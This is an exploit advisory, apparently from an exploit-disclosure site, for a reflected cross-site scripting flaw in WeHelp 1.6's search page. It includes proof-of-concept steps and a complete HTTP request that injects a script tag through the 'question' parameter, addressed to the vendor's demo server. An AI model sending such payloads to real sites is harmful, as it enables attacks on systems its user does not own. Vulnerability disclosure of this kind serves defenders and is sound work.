WeHelp 1.6 Cross Site Scripting

2019.02.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: WeHelp 1.6 - 'home/search question' Cross-site Scripting # Google Dork: N/A # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://www.elmanawy.info/ # Software Link: https://codecanyon.net/item/wehelp-ticket-support-system/22686943 # Demo Link: https://www.elmanawy.info/demo/wehelp/home # Version: 1.6 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- WeHelp 1.6 suffers from a Cross-site Scripting vulnerability. # POC: ---------------------- 1. Access the following path http://[PATH]/home/search 2. Manipulate the parameter "question" with your own XSS payload. # Request: ---------------------- GET /demo/wehelp/home/search?question=<script>alert('XSS')</script> HTTP/1.1 Host: www.elmanawy.info Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 X-XSS-Protection: 0


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top